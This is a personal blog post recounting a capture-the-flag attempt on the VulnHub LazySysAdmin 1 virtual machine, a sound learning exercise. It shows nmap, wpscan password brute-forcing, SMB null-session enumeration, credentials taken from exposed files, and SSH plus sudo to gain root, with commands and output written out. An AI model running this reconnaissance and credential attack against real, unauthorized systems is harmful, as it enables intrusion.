NeilSec: Security Learning Blog

Pentesting, infosec, hacking, learning.

  • Home
  • Knowledgebase
You are here: Home / CTF / Vulnhub: LazySysAdmin 1 – CTF attempt

Vulnhub: LazySysAdmin 1 – CTF attempt

2017-10-13 by Neil Leave a Comment

I’ve never tried a VulnHub box before. I initially downloaded the Bulldog one but couldn’t even work out what its IP address was! LazySysAdmin 1 caught my eye. Apparently created as the author failed his OSCP – my kind of guy and this one seems to pick up DHCP OK so found it on 192.168.3.20

First off some nmapping to see what’s there:

Initial Enumeration

(makes it sound like I have a formal plan, which I don’t, but should)

root@kali2017-1:~# nmap -sS 192.168.3.20
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-13 08:22 BST
Nmap scan report for 192.168.3.20
Host is up (0.00025s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
6667/tcp open  irc
MAC Address: 00:0C:29:CD:54:BA (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.61 seconds
root@kali2017-1:~# nmap -sV 192.168.3.20
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-13 08:37 BST
Nmap scan report for 192.168.3.20
Host is up (0.00025s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
MAC Address: 00:0C:29:CD:54:BA (VMware)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

So looks like an Ubuntu box running a web server, SSH, samba shares, a MySQL database (probably for the website) and an IRC server.

This is the bit in the process I start to worry – lots of things there and not sure which one to go for first. Starting at the top of the list: OpenSSH 6.6.1p1. Googling doesn’t offer up any obvious exploits. I’m sure there is a better way of running service versions through a tool to find these – need to find out.

Apache 2.4.7 – this has exploits by the look of it but the site I looked at had “none” in every instance in the column marked “access gained” so that doesn’t look promising.

So onto the website. Firefox to the IP and a site pops up. Not actually much there. Buttons don’t do anything. Links go nowhere other than a couple of external ones at the bottom of the page.

So now what? Consult my course notes. Doesn’t seem a lot of point in using Burp as no transactions are taking place although maybe its Spider would find things. Dirbuster seems like a better shot. Maybe there are some hidden directories and files, what with it clearly being an unfinished mock-up website. I choose directory-list-2.3-small.txt wordlist as I don’t want to be waiting an age. It immediately starts finding an absolute shed-load of stuff.

 

It’s running WordPress in the /wordpress directory, we can get to phpmyadmin (a web interface for managing SQL databases) and there are some other folders. Visiting the site:

 

Is someone trying to tell us something here? Several times? And is his name togie? Jot that down as a possible username for later. Not much else to see here. Maybe give wpscan a spin with a general scan:

 

WPSCAN

wpscan -u 192.168.3.20/wordpress

The most interesting thing this finds is:

[!] 1 vulnerability identified from the version number
[!] Title: WordPress 2.3-4.8.2 - Host Header Injection in Password Reset
    Reference: https://wpvulndb.com/vulnerabilities/8807

The vulnerability involves setting a different email for password resets. Since this machine is on my network I’m not sure how useful that is.

wpscan -u 192.168.3.20/wordpress --enumerate u
[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
    +----+-------+---------+
    | Id | Login | Name    |
    +----+-------+---------+
    | 1  | admin | Admin – |
    +----+-------+---------+
[!] Default first WordPress username 'admin' is still used

Hooray. We have a login name: admin

wpscan gives some options and one of them is to bruteforce the login with an known username so I try that:

wpscan --url 192.168.3.20/wordpress --wordlist /usr/share/seclists/Passwords/darkc0de.txt --username admin

That looks like it’s going to take a while and whilst it’s revving my laptop fan, I’ll see what else I can be looking into.

SAMBA shares

Time to dig out my pentesting course notes on null shares. First thing my notes suggest is nmblookup

root@kali2017-1:~# nmblookup -A 192.168.3.20
Looking up status of 192.168.3.20
	LAZYSYSADMIN    <00> -         B <ACTIVE> 
	LAZYSYSADMIN    <03> -         B <ACTIVE> 
	LAZYSYSADMIN    <20> -         B <ACTIVE> 
	WORKGROUP       <00> - <GROUP> B <ACTIVE> 
	WORKGROUP       <1e> - <GROUP> B <ACTIVE> 
	MAC Address = 00-00-00-00-00-00

the <20> means there is an active share on the computer called LAZYSYSADMIN

root@kali2017-1:~# smbclient -L //192.168.3.20 -N
WARNING: The "syslog" option is deprecated
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	share$          Disk      Sumshare
	IPC$            IPC       IPC Service (Web server)

smbclient -L lists the shares and the -N switch tells it not to use a password

So there is a share there called “share$” In the meantime I’ve turned off wpscan’s password forcing as I’m scared my laptop will die from heat exhaustion. Now everything is strangely quiet as I pull the next tool from the badly written Word print out I’m working off:

root@kali2017-1:~# enum4linux -a 192.168.3.20
Starting enum4linux v0.8.9 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Oct 13 10:22:10 2017
 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.3.20
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ==================================================== 
|    Enumerating Workgroup/Domain on 192.168.3.20    |
 ==================================================== 
[+] Got domain/workgroup name: WORKGROUP
 ============================================ 
|    Nbtstat Information for 192.168.3.20    |
 ============================================ 
Looking up status of 192.168.3.20
	LAZYSYSADMIN    <00> -         B <ACTIVE>  Workstation Service
	LAZYSYSADMIN    <03> -         B <ACTIVE>  Messenger Service
	LAZYSYSADMIN    <20> -         B <ACTIVE>  File Server Service
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
	MAC Address = 00-00-00-00-00-00
 ===================================== 
|    Session Check on 192.168.3.20    |
 ===================================== 
[+] Server 192.168.3.20 allows sessions using username '', password ''
 ========================================= 
|    Share Enumeration on 192.168.3.20    |
 ========================================= 
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	share$          Disk      Sumshare
	IPC$            IPC       IPC Service (Web server)
[+] Attempting to map shares on 192.168.3.20
//192.168.3.20/print$	Mapping: DENIED, Listing: N/A
//192.168.3.20/share$	Mapping: OK, Listing: OK
//192.168.3.20/IPC$	Mapping: OK	Listing: DENIED
 ======================================================================= 
|    Users on 192.168.3.20 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username '', password ''
S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)
S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\togie (Local User)

The actual output is mahoosive and I’ve stripped most of the crap away. Important things, IMO, are:

  • It allows null sessions
  • We can list and map share$
  • There is a user called nobody (I think?)
  • There is a unix user call togie

My notes say we can connect to shares with smbclient \\\\host\\sharename -N with the -N meaning null session (i.e. user/pass not required)

root@kali2017-1:~# smbclient \\\\192.168.3.20\\share$ -N 
WARNING: The "syslog" option is deprecated
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> ls
  .                                   D        0  Tue Aug 15 12:05:52 2017
  ..                                  D        0  Mon Aug 14 13:34:47 2017
  wordpress                           D        0  Thu Oct 12 16:23:54 2017
  Backnode_files                      D        0  Mon Aug 14 13:08:26 2017
  wp                                  D        0  Tue Aug 15 11:51:23 2017
  deets.txt                           N      139  Mon Aug 14 13:20:05 2017
  robots.txt                          N       92  Mon Aug 14 13:36:14 2017
  todolist.txt                        N       79  Mon Aug 14 13:39:56 2017
  apache                              D        0  Mon Aug 14 13:35:19 2017
  index.html                          N    36072  Sun Aug  6 06:02:15 2017
  info.php                            N       20  Tue Aug 15 11:55:19 2017
  test                                D        0  Mon Aug 14 13:35:10 2017
  old                                 D        0  Mon Aug 14 13:35:13 2017
		3029776 blocks of size 1024. 0 blocks available
smb: \> 

I’ve got an smb session here and some files and folders, some of which are recognisable from the Dirbuster scan. So looks like this share contains the website stuff. I could use smb commands like get to get the files but I’m gonna try Kali’s file browser first.

Fill in the server details: smb://192.168.3.20/share$ and now I’ve got a much easier way of browsing the share and it satisfies the Windows admin in me. Files first:

todolist.txt: “Prevent users from being able to view to web root using the local file browser” – it’s a bit late for that now son.

deets.txt: “CBF Remembering all these passwords. Remember to remove this file and update your password after we push out the server. Password 12345“

Nothing interesting in robots.txt. I try writing to the share but not allowed.

But we have a password and two usernames: admin and togie. Can I log onto the share using these credentials I wonder? Well not sure really. Using the username togie works but then it accepts any password and commands to write to the share are still not allowed.

I’l check out the folders. To cut a long story short, there is an important WordPress file called wp-config.php

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'Admin');
/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');
/** MySQL hostname */
define('DB_HOST', 'localhost');

So now we have credentials for the mysql database. Admin and TogieMYSQL12345^^ I try connecting from my kali box but it says:

ERROR 1130 (HY000): Host '192.168.3.25' is not allowed to connect to this MySQL server

Assuming I’m not doing something wrong (ha ha good one) then looks like remote connections are not allowed. Maybe the myql creds come in handy later. The securi-tay box used them to get root privs so you never know.Actually, Dirbuster told us about access to myphpadmin so maybe the creds come in handy there?

But before that, let’s try out some of these credentials on the Lazysysadminbox:

Really? That’s it? Weird. So nothing fancy with WordPress or myphpadmin required? I’m gonna ssh into it now simply because it’s easier to copy and paste the code to this blog

root@kali2017-1:~# ssh togie@192.168.3.20
The authenticity of host '192.168.3.20 (192.168.3.20)' can't be established.
ECDSA key fingerprint is SHA256:pHi3EZCmITZrakf7q4RvD2wzkKqmJF0F/SIhYcFzkOI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.3.20' (ECDSA) to the list of known hosts.
##################################################################################################
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         # 
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   # 
##################################################################################################
togie@192.168.3.20's password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)
togie@LazySysAdmin:~$ ls /
bin   dev  home        lib         media  old  proc  run   srv  tmp  var
boot  etc  initrd.img  lost+found  mnt    opt  root  sbin  sys  usr  vmlinuz
togie@LazySysAdmin:~$ cd /
-rbash: cd: restricted
togie@LazySysAdmin:~$ cd root
-rbash: cd: restricted
togie@LazySysAdmin:~$ sudo su
[sudo] password for togie: 
root@LazySysAdmin:/home/togie# cd root
bash: cd: root: No such file or directory
root@LazySysAdmin:/home/togie# ls
root@LazySysAdmin:/home/togie# cd ..
root@LazySysAdmin:/home# ls
togie
root@LazySysAdmin:/home# cd ..
root@LazySysAdmin:/# ls
bin   dev  home        lib         media  old  proc  run   srv  tmp  var
boot  etc  initrd.img  lost+found  mnt    opt  root  sbin  sys  usr  vmlinuz
root@LazySysAdmin:/# cd root
root@LazySysAdmin:~# ls
proof.txt
root@LazySysAdmin:~# cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851

Well done :)
Hope you learn't a few things along the way.
Regards,
Togie Mcdogie


Enjoy some random strings
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
root@LazySysAdmin:~# 

In a nutshell: couldn’t get to the root folder. Sudo su accepted togie’s 12345 password. Now have full access and capture the flag.

Filed Under: CTF, Penetration Testing Tagged With: Boot-to-Root, CTF, Penetration Testing, VulnHub

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

About Me

I’m currently a systems admin / consultant at a IT firm who looks after the computer systems of small businesses in the UK. IT security is only a part of that job. However I’ve always enjoyed breaking into, getting around, subverting and otherwise hacking things, systems and ideas. In tackling some low-level IT security tasks I reignited my interest in the field and this blog charts my progress in the world of Computer Security, legal Hacking, Penetration Testing, Infosec – whatever you want to call it. As a Windows guy I’m learning about Linux, shell-scripting, python and all the other skills needed in this field.

Tags

Apache Boot-to-Root CTF curl dib Dirbuster FreeBSD Hack The Box Linux mysql NFS Penetration Testing PHP RCE shell VulnHub Wordpress

Categories

© 2022 · NeilSec;